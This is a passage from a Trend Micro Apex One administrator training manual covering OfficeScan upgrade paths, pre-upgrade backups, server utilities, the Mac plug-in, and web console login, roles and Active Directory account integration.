OfficeScan 11 SP1, XG or XG SP1 using the built-in Codebase database, you will be prompted to

© 2019 Trend Micro Inc. Education 39


Lesson 2: Trend Micro Apex One Server

provide details of an SQL Server instance. If an installation of SQL Server is not available, SQL
Server Express can be installed as part of the setup.

To plan the deployment of Security Agents, sizing details of the Agent deployment packages are
displayed.

40 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

If the option to use SQL Server Express was enabled, the database in installed and the Codebase
tables are transitioned.

If Control Manager was used for policy management, it can also be upgraded to Apex Central.

New Server

This mode installs Apex One on a separate, new server. Policies are exported from the existing
OfficeScan installation, which are then imported into the new Apex One installation. OfficeScan
Agents from the existing OfficeScan installation can then be moved to the new Apex One Server.

Best Practice: Since the new server installation provides more flexibility in determining when Agents
are moved and also allows you to transition to different hardware or operating
systems easily, this method is the recommended upgrade method.

Upgrading OfficeScan (on-premise) to Apex One as a Service


For on-premise installations of OfficeScan XG that do not use Control Manager, the upgrade to a
SaaS implementation is fairly straight forward. An Apex One SaaS account in created though the
licensing portal and an instance of Apex One is provisioned. Export your policies from the on-
premise OfficeScan XG server and import them into the Apex One SaaS. Finally, from the Web
Management console in OfficeScan XG, move the Agents to the new SaaS installation which will
trigger an upgrade to the Security Agents. Finally, the original OfficeScan XG Server can be
decommissioned.

© 2019 Trend Micro Inc. Education 41


Lesson 2: Trend Micro Apex One Server

For on-premise installations of OfficeScan XG that use Control Manager for policy management, and
you wish to retire both the OfficeScan XG and Control Manager Servers, the upgrade to a SaaS
implementation is slightly different. An Apex One SaaS account in created though the licensing
portal and an instance of Apex One is provisioned. Export your policies from Control Manager and
import them into the Apex On SaaS. Finally, from the Web Management console in OfficeScan XG,
move the Agents to the new SaaS installation which will trigger an upgrade to the Security Agents.
The original OfficeScan XG Server and Control Manager can be decommissioned. Keep in mind that
an on-premise installation of Apex Central is required if using Connected Threat Defense.

For on-premise installations of OfficeScan XG that use Control Manager for policy management, and
you wish to retire the OfficeScan XG but keep the Control Manager Server, the upgrade to a SaaS
implementation is as follows. An Apex One SaaS account in created though the licensing portal and
an instance of Apex One is provisioned. Connect Apex One SaaS to Control Manager and from the
Web Management console in OfficeScan XG, move the Agents to the new SaaS installation which will
trigger an upgrade to the Security Agents. The original OfficeScan XG Server can be
decommissioned.

Upgrading OfficeScan Agents to Apex One Security Agents


OfficeScan Agents are automatically upgraded to Apex One Security Agents when the Server is
upgraded. To delay the upgrade of Agents, turn off the Agent auto-update feature in OfficeScan XG
before upgrading. This will be important in situations where bandwidth is limited.

In OfficeScan, access Privileges and Other Settings and set the OfficeScan agents only update the
following components item to Pattern files only. Click Apply to All Agents.

When you decide to proceed with upgrading agents, In the new Apex One server, set this value to All
components (including hotfixes and the Agent program). When the OfficeScan Agent receives this
new settings, it will upgrade to an Apex One Security Agent.

42 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Upgrading to the Integrated Agent

In OfficeScan XG, Endpoint Sensor, Application Control, and Vulnerability Protection required a
separate Agent on the endpoint. In Apex One, this functionality is now integrated in Apex One
Server and Security Agent.

When Endpoint Sensor, Application Control, and Vulnerability Protection features are enabled
through policy in Apex Central, and the policy is deployed to the Agents, the standalone Agent
for that feature will be removed and a new Apex One services will be launched.

Pre-Upgrade Backup Considerations


It is important to back up the OfficeScan database and important configuration files before
upgrading the Apex One Server. If upgrading a version of OfficeScan using the built-in Codebase
database, it will be upgraded to Microsoft SQL Server as part of the process, using either a instance
of SQL Server or a new installation of SQL Server Express. Back up the OfficeScan Server database
to a location outside the OfficeScan program directory.
• Back up the database from the OfficeScan Web Management console by going to
Administration > Database Backup. If you have already transitioned to SQL with OfficeScan,
use the SQL tools to backup the database
• Manually back up the following files and folders found in the ...\PCCSRV folder:
- ofcscan.ini: Contains global client settings
- ous.ini: Contains the update source table for antivirus component deployment
- Private folder: Contains firewall and update source settings
- ...\Web\tmOPP folder: Contains Outbreak Prevention settings
- ...\Pccnt\Common\OfcPfw*.dat: Contains firewall settings
- ...\Download\OfcPfw*.dat: Contains firewall deployment settings
- ...\Log folder: Contains system events and the connection verification logs
- ...\Virus folder: Contains quarantined files
- ...\HTTPDB folder: Contains the OfficeScan database, if using Codebase
• Back up the existing key and certificate using the Authentication Certificate Manager Tool
(CertificateManager.exe).
After the new installation completes, import the backed-up key and certificate to allow
communication authentication between the Apex One Server and Security Agents to
continue uninterrupted. If you create a new certificate during Server installation, Security
Agents cannot authenticate Server communication because they would still be using the old
certificate.

© 2019 Trend Micro Inc. Education 43


Lesson 2: Trend Micro Apex One Server

Migrating Apex One Servers


Apex One Administrators can use the Server Migration Tool to copy settings from previous OfficeScan
versions to the current version.

This tool exports the following settings from OfficeScan 10.0 and later, and imports the settings to the
current version of Apex One:
• Domain structures
• Additional service settings *
• Manual Scan settings *
• Spyware/Grayware approved list *
• Scheduled Scan settings *
• Global Agent settings
• Real-time Scan settings *
• Endpoint location
• Scan Now settings *
• Firewall policies and profiles
• Web Reputation settings *
• Smart Protection sources
• Approved URL list *
• Server update schedule
• Behavior Monitoring settings *
• Agent update source and schedule
• Device Control settings *
• Notifications
• Data Loss Prevention settings *
• Proxy settings
• Privileges and other settings *
• OfficeScan_Agent_Port and Client_LocalServer_Port in the ofcscan.ini file

Note: Settings with an asterisk (*) retain the configurations at both the root and domain level. The tool
does not back up the Security Agent listings of the Apex One Server only the domain structures.
Security Agent only migrates features available on the older version of the Security Agent
server. For features that are not available on the older server, Security Agent applies the default
settings.

44 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

1 From the Apex One Web Management console, go to Administration > Settings > Server
Migration and click Download Apex One Settings Export Tool. Save the
ApexOneSettingsExportTool.zip file to the hard drive.

Alternately, navigate to the following folder on the Apex One Server computer:
...\PCCSRV\Admin\Utility\PolicyExportTool
2 Copy the ApexOneSettingsExportTool.zip file or the ...\PolicyExportTool folder to the
source OfficeScan server computer.
3 Double-click OfficeScanSettingsExportTool.exe to start the OfficeScan Settings Export
Tool.
4 Copy the resulting Server_Settings_Migration.zip package to a location that the
destination Apex One Server can access.
5 To import the settings to the destination Apex One server, go to Administration > Settings >
Server Migration and click Import Settings.

6 Locate the Apex One_Server_Migration.zip package and click Open.


7 Verify that the server contains all the previous Apex One version settings.

The Server Migration Tool that is packaged with the current Apex One release must be used to export
the settings from the previous OfficeScan version.

© 2019 Trend Micro Inc. Education 45


Lesson 2: Trend Micro Apex One Server

Server Service Setup Utility


The Server Service Setup Utility allows administrators to perform certain functions through a Command
Line interface.

Open the Windows Command Prompt on the Apex One Server and navigate to the following folder:
...\PCCSRV\

Type the following command with the necessary parameters:


svrsvcsetup.exe [parameter]

A partial list of parameters is provided in this table.

Parameter Description
/? Displays parameter information for the command.
Installs and starts the Apex One Master Service, and creates virtual
directories.

This parameter will:


• Check dependencies and then stop related IIS services
• Stop the IIS service
-install
• Delete the previous virtual key in the IIS metabase
• Read virtual directory information (VIRDIR_INFO) from the uninstall
configuration file (ofuninst.ini)
• Write information to IIS metabase
• Restart IIS and dependencies
Uninstalls Apex One-related services but does not remove configuration files
or the Apex One database.

The Apex One Master Service, and Web server dependencies are removed.

-uninstall This parameter will:


• Check dependencies and then stop IIS-related services
• Delete virtual directories ([VIRDIR_INFO]) information from uninstall log
file (ofuninst.ini)
• Restart IIS
-uninstall_upg Back up settings and files for upgrade scenarios before removing Apex One.
Enables SSL on the selected Web server. This command will:
• Create a new private key in
…\PCCSRV\Private\certificate\privkey.pem
• Blank the main login screen
-enablessl • Change the settings in the file to reflect these new keys
• Generate ...\PCCSRV\Result.log if the command is successful. The
content of the log is:
[RESULT]
Success=0

46 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Parameter Description
Migrates the Apex One Server from the TMI-based Security Agent for Apex
Central to the MCP-based Agent:
-migratecmAgent • MigrateTMICfgToMCP
• TryToUninstallTMIAgent
Enables IPv6 functionalities in the Apex One Server, and subsequently deploys
-EnableIPv6
IPv6 to Agents.

More information on svrsvcsetup.exe can be found in the following document in the Trend Micro
Knowledge Base:

http://esupport.trendmicro.com/solution/en-us/1036488.aspx

Apex One (Mac)


Apex One (Mac) (previously known as Trend Micro Security for Mac) protects Mac endpoints against
security risks, blended threats, and platform independent web-based attacks. As with Apex One for
Windows, a Security Agent is installed on the Mac endpoint and reports its security status back to the
Apex One (Mac) Server. The Server manages all the endpoints and administrators can easily configure
security policies and deploy updates to every security agent through a separate Web Management
console. Apex One (Mac) policies and endpoints can also be managed through Apex Central.

Apex One (Mac) maintains all the capabilities of Trend Micro Security for Mac but introduces some new
features including:
• Updated Web Management console: The new Apex One (Mac) Server Web Management console
makes it easier to manage and provides administrators with a modern interface experience.
• Predictive Machine Learning support: Apex One (Mac) adds a new engine to detect this emerging
unknown security risks. It performs behavioral analysis on unknown, low-prevalence processes
to determine if an emerging threat is attempting to infect the network.
• Smart Scan enhancements: Apex One (Mac) adds a a new pattern called Mac Heuristic Pattern.
This new pattern is used by Smart Scan to identify malware specifically targeting Mac platforms.
• Device Control: Apex One (Mac) has added Device control to allow administrators to limit usage
on external devices.
• Scan Mach-O File Type: Apex One (Mac) introduces a new scan method called Scan Mach-O File
Type. This method aims to improve the scan performance on Mac endpoints and is available for
Full Scan and Manual Scans.
• Trusted Program list: Trusted Program List allows Security Agents to skip scanning of trusted
processes to improve performance during scanning on endpoints. This list now includes common
Mac applications.
• Integrated Endpoint Sensor: Metadata collected from Mac endpoints is collected by the
integrated Endpoint Sensor and enables Preliminary Assessments on these endpoints.

© 2019 Trend Micro Inc. Education 47


Lesson 2: Trend Micro Apex One Server

Installing the Apex One (Mac) Plug-In


Apex One (Mac) is installed through the plug-in interface in Apex One. A separate Web Management
console will become available to manage settings and configuration of the Mac Security Agents.

Note: The Microsoft .NET Framework 3.51 is required to install the Apex One (Mac) plug-in.

1 In the Apex One Web Management console, click the Plug-ins menu. In the Apex One (Mac)
section, click Download.

2 Confirm the download of Apex One (Mac) and click OK to proceed. A progress bar displays the
status of the download.

3 After the download is complete, click Install Now, and accept the license agreement.

48 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

4 Once installed, click Manage Program.

5 Type the Apex One (Mac) Activation Code and click Save.

Apex One (Mac) Web Management Console


To access the Apex One (Mac) console, open the Apex One Web Management console and click Plug-
ins. In the Apex One (Mac) Section, click Manage Program.

© 2019 Trend Micro Inc. Education 49


Lesson 2: Trend Micro Apex One Server

Apex One Plug-Ins


Apex One includes a framework called Plug-in Manager that integrates new solutions into the existing
Apex One on-premise environment. Plug-in Manager delivers the following:
• Native Product Features: Some native Apex One features are licensed separately and activated
through Plug-in Manager. In this release, two features fall under this category, namely, Trend
Micro Virtual Desktop Support and Apex One Data Protection.
• Plug-in programs: Plug-in programs are not part of the Apex One program. The plug-in programs
have separate licenses and management consoles. Access the management consoles from
within the Apex One Web Management console. Examples of plug-in programs are Trend Micro
Apex One Toolbox, Apex One (Mac) and some of the Deployment Tools.
• Dashboard tabs and widgets: The Apex One Dashboard screen requires Plug-in Manager to
display the tabs and widgets used to monitor the Apex One Server and Agent protection status.

Plug-in Manager delivers the following plug-ins for Apex One:

Apex One Data Protection


Apex One Data Protection is designed to minimize the risk of information loss and improve visibility
of data usage patterns and risky business processes so your private information remains secure.
You gain broad coverage, high performance, and deployment flexibility needed to comply with
regulatory mandates.

Trend Micro Endpoint Encryption Deployment Tool


Trend Micro Endpoint Encryption ensures end-to-end data protection by providing FIPS 140-2 full
disk encryption for data at rest and file, folder, and removable media encryption for data in motion.
The Trend Micro Endpoint Encryption Deployment Tool provides a framework to centrally manage,
deploy, and execute Agent installation/uninstallation commands to endpoints managed by the Apex
One server. The tool leverages the Apex One server client tree hierarchy to remotely execute
deployment tasks.

Before attempting to install Trend Micro Endpoint Encryption, ensure that the environment meets all
system requirements.

Apex One (Mac)


Apex One (Mac) (previously known as Trend Micro Security for Mac) protects Mac endpoints against
security risks, blended threats, and platform independent web-based attacks.

Trend Micro Virtual Desktop Support


Optimize virtual desktop protection by using Trend Micro Virtual Desktop Support. This feature
regulates tasks on Apex One clients residing in a single virtual server.

50 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Trend Micro Apex One Toolbox


The Apex One Toolbox functions as a framework that manages, deploys, executes and consolidates
logs for a variety of standalone Trend Micro tools. The Toolbox leverages the Agent tree hierarchy
of the Apex One Server to remotely execute these tools on Security Agents managed by the Apex
One Server.

Apex One Utilities


Apex One includes a collection of stand-alone utilities and tools to simplify certain server tasks. These
utilities and tools can also be accessed from the following folder on the Apex One Server:
...\PCCSRV\admin\Utility

Authentication Certificate Manager


The Authentication Certificate Manager tool is used to manage Trend Micro certificates and keys.

This utility (CertificateManager.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\CertificateManager

Agent Packager
The Agent Packager tool creates an installation package that you can send to users using
conventional media such as CD-ROM. Users run the package on the Agent endpoint to install or
upgrade the Security Agent and update components.

Agent Packager is especially useful when deploying the Security Agent or components to endpoints
in low-bandwidth remote offices. Security Agents installed using Agent Packager report to the
server where the package was created.

This utility (ClnPack.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ClientPackager

Cisco Trust Agent


The Cisco Trust Agent (CTA) enables the Apex One client to report antivirus information to Cisco
ACS.

The CTA packages are located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\CTA

© 2019 Trend Micro Inc. Education 51


Lesson 2: Trend Micro Apex One Server

Domains Schedule Update


The update schedule configured in automatic client updates only applies to clients with scheduled
update privileges. For other clients, you can set a separate update schedule. To do this, you will need
to configure a schedule by client tree domains. All clients belonging to the domain will apply the
schedule.

This utility (dsu_convert.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\DomainScheduleUpdate

Edge Relay Server Installer


The Apex One Edge Relay Server provides administrators with visibility and increased protection of
endpoints that users take outside of the company's intranet.

The installation program for the Edge Relay Server (setup.exe) is located in the following folder on
the Apex One Server:
...\PCCSRV\admin\Utility\EdgeServer

Gateway Settings Importer


Apex One checks the endpoint's location to determine the Web Reputation policy to use and the
Smart Protection source to which to connect. One of the ways Apex One identifies the location is by
checking the endpoint's gateway IP address and MAC address.

Configure the gateway settings on the Endpoint Location screen or use the Gateway Settings
Importer tool to import a list of gateway settings to the Endpoint Location screen.

The Gateway Settings Importer tool (GSImporter.exe) is located in the following folder on the
Apex One Server:
...\PCCSRV\admin\Utility\GatewaySettingsImporter

Image Setup
Disk imaging technology allows you to create an image of the Security Agent using disk imaging
software and make clones of it on other computers on the network. Each Security Agent installation
needs a Globally Unique Identifier (GUID) so that the server can identify Agents individually. Use the
Apex One program called ImgSetup.exe to create a different GUID for each of the clones.

This utility (ImgSetup.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ImgSetup

52 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Agent Mover
If you have more than one Apex One server on the network, use the Agent Mover tool to transfer
Security Agents from one Apex One server to another. This is especially useful after adding a new
Apex One server to the network and you want to transfer existing Security Agents to the new server.

This utility (IpXfer.exe or IpXfer_x64.exe) is located in the following folder on the Apex One
Server:
...\PCCSRV\admin\Utility\IpXfer

Integrated Service Package


This folder contains installers for the integrated Application Control, Vulnerability Protection,
Advanced Threat Assessment and Endpoint Sensor components.

These installers are located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\iServicePackage

Integrated Smart Protection Server Tool


The Trend Micro Integrated Smart Protection Tool helps administrators install or uninstall an
Integrated Smart Protection Server after the Apex One server installation is completed.

This Integrated Smart Protection Tool Installer program (ISPSInstaller.exe) is located in the
following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ISPSInstaller

Device List Tool


Run the Device List Tool locally on each endpoint to query external devices connected to the
endpoint. The tool scans an endpoint for external devices and then displays device information in a
browser window. You can then use the information when configuring device settings for Data Loss
Prevention and Device Control.

This utility (listDeviceInfo.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ListDeviceInfo

Message Queue
This utility is used to interact with the Windows Message Queuing service.

This utility (mqtool.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\MessageQueue

© 2019 Trend Micro Inc. Education 53


Lesson 2: Trend Micro Apex One Server

Console Password Reset Tool


This utility can reset the Apex One Web Management console password in situations where the
password has been lost or the previous administrator has left the company without providing the
password to the new staff.

This utility (OSCEResetPW.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\OSCEResetPW

Plug-in Manager Installer


This utility installs the Apex One Plug-in Manager.

This utility (PLMSetup.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\PLM

Apex One Settings Export Tool


This Apex One Settings Export Tool allows administrators to copy Apex One settings from previous
Apex One versions to the current version.

This utility (ApexOneSettingsExportTool.exe) is located in the following folder on the Apex


One Server:
...\PCCSRV\admin\Utility\PolicyExportTool

Apex One Server Migration Tool


The Apex One Server Migration Tool is a tool that helps you to move the Apex One settings or
configuration from one Apex One server to another.

This utility (ServerMigrationTool.exe) is located in the following folder on the Apex One
Server:
...\PCCSRV\admin\Utility\ServerMigrationTool

ServerProtect Normal Server Migration Tool


The ServerProtect Normal Server Migration Tool is a tool that helps migrate computers running
Trend Micro ServerProtect Normal Server to the Security Agent.

This utility (SPNSXfr.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\SPNSXfr

54 © 2019 Trend Micro Inc. Education


Lesson 2: Trend Micro Apex One Server

Server Tuner
Use Server Tuner to optimize the performance of the Apex One Server using parameters for server-
related performance issues, including downloads and network traffic.

This utility (SvrTune.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\SvrTune

Apex One VDI Pre-Scan Template Generation Tool


Use the Apex One VDI Pre-Scan Template Generation Tool to optimize on-demand scans or remove
GUIDs from base or golden images. This tool scans the base or golden image and certifies the image.
When scanning duplicates of this image, Apex One only checks parts that have changed. This ensures
shorter scanning time.

This utility (TCacheGen.exe or TCacheGen_x64.exe) is located in the following folder on the Apex
One Server:
...\PCCSRV\admin\Utility\TCacheGen

System Health Validator


This utility is required to support Network Access Protection (NAP) in Apex One.

This utility (OfficeScanNAPSAV_x64.exe) is located in the following folder on the Apex One
Server:
...\PCCSRV\admin\Utility\SystemHealthValidator

Trend Micro Vulnerability Scanner


The Vulnerability Scanner checks the presence of security software on host machines and can install
the Security Agent to unprotected host machines.

This utility (TMVS.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\TMVS

Cache Generator
This utility is as part of the Gold Image creation process. Any machines provisioned from this gold
image will be able to assign a new GUID by itself upon boot up. The standard user will not have to do
anything related to Apex One on their machine.

This utility (TCacheGen_x64.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\TCacheGen

© 2019 Trend Micro Inc. Education 55


Lesson 2: Trend Micro Apex One Server

Touch Tool
The Touch Tool synchronizes the time stamp of one file with the time stamp of another file or with
the system time of the computer. If you unsuccessfully attempt to deploy a hot fix on the Apex One
server, use the Touch Tool to change the time stamp of the hot fix. This causes Apex One to interpret
the hot fix file as new, which makes the server attempt to automatically deploy the hot fix again.

This utility (TMTouch.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\Touch

Decrypt Tool
To prevent quarantined infected from being opened, Apex One encrypts the file before quarantining
it or when backing up a file before cleaning it. Apex One provides a tool that decrypts and then
restores the file in case you need to retrieve information from it.

This utility (VSEncode.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\VSEncrypt

56 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Lesson 3: Trend Micro Apex One Web


Management Console

Lesson Objectives:

After completing this lesson, participants will be able to:


• Complete administrative tasks through the Apex One Web Management console
• Describe the steps in the Web Management console login process
• Create new roles and user accounts
• Import user accounts from Active Directory

The Apex One Web Management console allows administrative users with the appropriate permissions to
manage policies, computers and system settings through a Web-based interface. Administrative users
authenticate to the Apex One Web Management console through a supported browser, and click the
appropriate menu and interface components to perform system operation.

The Apex One Web Management console is the central point for monitoring Apex One throughout the
corporate network. The console comes with a set of default settings and values that you can configure
based on your security requirements and specifications. The Web Management console uses standard
Internet technologies, such as JavaScript, CGI, HTML, and HTTPS.

© 2019 Trend Micro Inc. Education 57


Lesson 3: Trend Micro Apex One Web Management Console

Some of the administrative tasks completed in the Web Management console include:
• Deploying and managing Security Agents installed on networked endpoints
• Grouping Agents into logical domains for simultaneous configuration and management
• Setting scan configurations and initiating manual scan on a single or multiple networked
endpoints
• Configuring notifications about security risks on the network and viewing logs sent by Agents
• Configuring outbreak criteria and notifications
• Delegating Web Management console administration tasks to other Apex One administrators by
configuring roles and user accounts
• Ensuring that Agents comply with security guidelines

Logging into the Web Management Console


The credentials used by the default root administrator are assigned during the Apex One Server setup
process.

This default user account called root cannot be deleted using the Web Management console.

Upon first login, it is the responsibility of the root user to define user roles and set up user accounts to
allow other administrative users to access the Web Management console without using the root account.

In a supported Web browser, type one of the following in the address bar based on the type of Apex One
server installation.
• With SSL on a default site:
https://<Apex One server FQDN or IP address>/officescan
• With SSL on a virtual site:
https://<Apex One server FQDN or IP address>:<port number>/officescan

Alternately, the Web Management console can be accessed on the Apex One Server itself by clicking the
Apex One Web Management console link in the Trend Micro Apex One Server program group in the
Windows Apps list.

58 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Web Management Console Communication


The Web Management console communicates with the Apex One Server over HTTPS at the server
port using CGI programs. The Web Management console CGIs are unique to the communication made
between the console and the Apex One Web server. A specific command handler responds to CGI
requests sent from the Web Management console.
Remote Host Apex One Server Host

Apex One
Web Management
Console IIS Apex One
(in browser) Server

Apex One
ISAPI/
Master
CGI
Service

dbserver.exe

Database

Note: The Web Management console does not support Windows 8, 8.1, or Windows Server 2012 in
Windows UI mode.

The Web Management console invokes CGIs to display Agent information, respond to Agent requests
and install Agents remotely. There are two types:
• Administration CGIs: These are used to display information on the Web Management console
and to respond to Agent requests. These are stored in:
…\PCCSRV\Web_OSCE\Web_console\CGI
• Remote Install CGIs: These are used to deploy Security Agents as part of remote installation
functionality. These are stored in:
...\PCCSRV\Web_OSCE\Web_console\RemoteInstallCGI

© 2019 Trend Micro Inc. Education 59


Lesson 3: Trend Micro Apex One Web Management Console

Login Process
The steps involved in the Web Management console login include the following:

Apex One
Server
IIS
Apex One Apex One
Web Management ISAPI/
Master
Console CGI
Service
(in browser) Database

Œ Login request  Parse cookies


to determine
previous login

Ž Account
verification
 Role-based
Authentication

 Result

Certificate warnings
Since the digital certificate created during the Apex One Server setup process is self-signed,
browsers may not recognize the digital signature applied to the certificate by the Apex One Server
and a certificate warning will be displayed when administrators log into the Apex One Web
Management console.

To access the console without any security warnings, the self-signed certificate of the Apex One
Server can be imported in the certificate store on the administrative user’s computer. Import the
certificate into the Trusted Root Certification Authorities > Registry store.

Alternately, the self-signed certificate and corresponding private key can be replaced with a new pair
of keys in which the public portion is submitted to a trusted commercial certification authority.

60 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Timeout Mechanism
The Web Management console timeout mechanism revolves around a session file created in the
following folder:
…\PCCSRV\TEMP

Session files are named *.key_xxxxxx, where xxxxxx represents a series of random numbers.
The Apex One Server creates this file each time a user logs on successfully.

Note: The inability to create this file will cause the Web Management console to always time-out even
during the login phase.

Go to Administration > Settings > Web Console to configure the required timeout settings. Select
Automatically log off inactive users to enable the Apex One server to log off users after a period of
inactivity (in minutes).

© 2019 Trend Micro Inc. Education 61


Lesson 3: Trend Micro Apex One Web Management Console

Automatic Refresh
The Web Management console can also be configured to automatically refresh the display of data.
Click Automatically refresh the web console to enable the refresh screen data at the specified
frequency (in seconds).

Active Directory Integration


Apex One can be integrated with an existing Microsoft Active Directory structure to manage Security
Agents more efficiently, assign Web Management console permissions using Active Directory accounts,
and determine which Agents do not have security software installed.

All users in the network domain can have secure access to the Apex One Web Management console. You
can also configure limited access to specific users, even those in another domain. The authentication
process and the encryption key provide validation of credentials for users.

Active Directory integration allows you to take full advantage of the following features:
• Role-based administration: Assign specific administrative responsibilities to users by granting
them access to the Web Management console using their Active Directory accounts.
• Custom Agent groups: Use Active Directory or IP addresses to automatically group Agents and
map them to domains in the Security Agent tree.
• Outside server management: Ensure that computers in the network that are not managed by the
Apex One Server comply with your company's security guidelines.

To integrate the Apex One Server with Active Directory, click Administration > Active Directory > Active
Directory Integration. Provide the details of the Active Directory domain and click Save and Synchronize.

62 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

If required, click Specify Domain Credentials to provide a username and password for domain
synchronization

Apex One Active Directory Integration Service


The Apex One Server relies on the Apex One Active Directory Integration Service to interface with
the Active Directory infrastructure. This service appears in the Windows service list.

© 2019 Trend Micro Inc. Education 63


Lesson 3: Trend Micro Apex One Web Management Console

Authenticating Administrative Users From Active Directory


The steps involved in authenticating administrative users with identities stored in Active Directory
include the following:

Apex One Apex One


Server Server
Apex One IIS
Web Management Apex One Apex One
console ISAPI/ Active
Master Active Directory
(in browser) CGI Directory
Service Integration Service

Œ Login request  Account


verification
Ž Identify Active
Directory account

 Request Active
Directory authentication
 Query
Active Directory

Result

Result

Result

Steps 1 and 2 are identical to how native Apex One accounts are processed. The difference arises
when the Apex One Server detects that the account is an Active Directory account, as shown in Step
3.

When Apex One Server detects that an Active Directory account is being used, it passes
authentication responsibility to the Apex One Active Directory Integration Service , which then
interfaces with the Active Directory server to verify the password provided.

If the account passes authentication, the Role-Based Administration process begins.

Administrative Accounts
In addition to the root account, additional administrative accounts or Active Directory accounts can be
added through the Apex One Web Management console.

Administrative accounts grant and control access to the Apex One Web Management console. If there
are several Apex One administrators in your organization, you can use this feature to assign specific
Web Management console privileges to the administrators and present them with only the tools and
permissions necessary to perform specific tasks. You can also control access to the Agent tree by
assigning them one or several domains to manage. In addition, you can grant non-administrators view
only access to the Web Management console.

64 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Each user (administrator or non-administrator) is assigned a specific role. A role defines the level of
access to the Web Management console. Users log on to the Web Management console using custom
user accounts or Active Directory accounts.

Role-based administration involves the following tasks:


• Defining user roles
• Configuring user accounts and assign a particular role to each user account.

The following activities related to administrative user access to the Web Management console are logged:
• Logging in to the Web Management console
• Modifying an administrative user password
• Logging off from the console
• Session timeout (user is automatically logged off)

Defining User Roles


Define and assign user roles to limit the access specific user accounts have to certain Web
Management console screens. You can define user roles to completely hide Web Management
console screens, limit access to Read Only, or grant full configuration rights.

Built-in Roles

There are two accounts and roles that are part of a default Apex One installation:

Administrator: Delegate this role to other Apex One administrators or users with sufficient
knowledge of Apex One. Users with this role have Configure permissions to all menu items.

Guest User: Users with this role have View permissions to all menu items except:
• Plug-ins
• Administration > Account Management > User Roles
• Administration > Account Management > User Accounts

© 2019 Trend Micro Inc. Education 65


Lesson 3: Trend Micro Apex One Web Management Console

Custom Roles

New custom user roles can be created if the available built-in roles do not satisfy the
requirements.

To create a custom role, click Add, and complete the Role Information and Role Permissions
sections.

• Click Menu items for Servers/Agents to specify permissions for menu settings for all servers
and Agents, regardless of the selected domain.
• Click Menu items for Managed Domains to specific permissions for menu settings in domains
configured in the Agent Tree Scope.

66 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Importing Roles

If you have saved custom roles from a different Apex One server and want to use these roles in
the current Apex One server, export the roles and import then into the current server. A *.dat
file containing the custom roles will be used to transfer the role details. Consider the following
when importing roles from another server:
• User Roles will be overwritten if you import a role with the same name.
• Importing roles can only be done between Servers that have the same version.
• A role imported from another Apex One Server retains the permissions for menu items
for Servers/Agents and menu items for managed domains.
• A role imported from another Apex One server applies the default permissions for Agent
Management menu items. On the other server, record the role's permissions for Agent
Management menu items and then re-apply them to the role that was imported.

Configuring User Accounts


Configure a user account or use Active Directory accounts to assign permissions to view or
configure the granular Agent settings, tasks, and data that are available in the Agent tree. You must
assign a particular role to each user, which determines the Web Management console menu items
that the user can view or configure. You can use Apex One user accounts to perform single sign-on
to Apex One from the Apex Central console.

A root account is created as part of the Apex One Server setup process and is assigned the built-in
Administrator role.

© 2019 Trend Micro Inc. Education 67


Lesson 3: Trend Micro Apex One Web Management Console

Adding Apex One Accounts

To create an Apex One account, go to Administration > Account Management > User Accounts
and click Add. Complete the details for the account, making sure to select an appropriate Role
from the list.

Importing Active Directory Accounts

Apex One administrators have the option to log on to the console using Active Directory
credentials. Both Active Directory users and groups can be used. The account and assigned
permissions exist in Apex One database, but login credentials remain in Active Directory
account.

68 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Apex One administrators can import Active Directory accounts which in turn creates an Apex
One account that is designated as an Active Directory account. Use Search to locate the Active
Directory user who will become an administrator, add to the Selected Users and Groups list and
click Next.

Select the Agent Tree Scope to define the branches of the Agent Tree this administrator will
have control over and click Next.

© 2019 Trend Micro Inc. Education 69


Lesson 3: Trend Micro Apex One Web Management Console

The new user account is displayed.

Accounts created by importing an Active Directory account also create a corresponding entry in
TrendAuthDef.xml file located in ...\PCCSRV\Private\AuthStore.

Note the following about imported accounts:


• Only the login name, full name of the user and Active Directory domain of which the
account is a part are recorded.
• Password information for the Active Directory account is not stored. As a result, the
password parameter is blank.
• The key account identifier is the WinUser parameter. If this is set to 1, then this is an
Active Directory user. A 0 would indicate that it is a native Apex One account.
• The SID for this account corresponds to the Active Directory account's SID. Apex One
accounts, on the other hand, use a locally generated number.

Note: Since the passwords for Active Directory administrators are not under the control of Apex One,
any password changes for these administrators must be performed through the Active Directory
tools.

Domain permissions
When defining permissions for domains, Apex One automatically applies the permissions for a
parent domain to all the subdomains that it manages. A subdomain cannot have lesser permissions
